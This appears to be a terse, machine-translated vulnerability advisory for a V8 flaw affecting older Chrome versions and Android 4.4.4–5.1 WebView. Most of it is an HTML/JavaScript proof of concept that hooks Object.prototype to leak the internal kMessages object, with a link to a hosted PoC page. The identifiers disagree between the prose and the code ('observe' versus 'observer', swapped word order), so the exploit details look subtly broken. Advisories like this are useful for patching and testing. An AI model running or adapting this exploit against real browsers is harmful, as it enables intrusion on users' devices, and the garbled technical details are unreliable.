Google V8 JavaScript Engine is Chrome browser for the development of a set of open source JavaScript engine.
The vulnerability is due to the source code in the "observe_accept_invalid" exception type was mistakenly written as "observe_invalid_accept"".
An attacker can use the vulnerability to cause kMessages key object information leakage, the implementation of arbitrary code.
Based on the 4.4.4 Android to 5.1 version of the system WebView controls the development of mobile phone APP are likely to be affected by the vulnerability.
Google Chrome V8 : 3.20 ~ 4.2 Version
Android: 4.4.4 ~ 5.1 Version
Code:
Proof of Concept
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>badkernel</title>
</head>
<script type="text/javascript">
var kMessages;
Object.prototype.__defineGetter__("observer_accept_invalid", function(){kMessages=this});
try{
Object.observer({},function(){}, 1);
} catch(e) {
}
delete Object.prototype["observer_accept_invalid"];
alert(kMessages);
</script>
</html>
Or
http://poc.hackertop.org/Android/v8rce_poc.htmlIf the browser can access the following page, if you can get the kMessages object,
Output object name is vulnerability
If output undefined does't vulnerability.
chrome://version
Refer:
http://www.cnnvd.org.cn/vulnerability/s ... 2016080414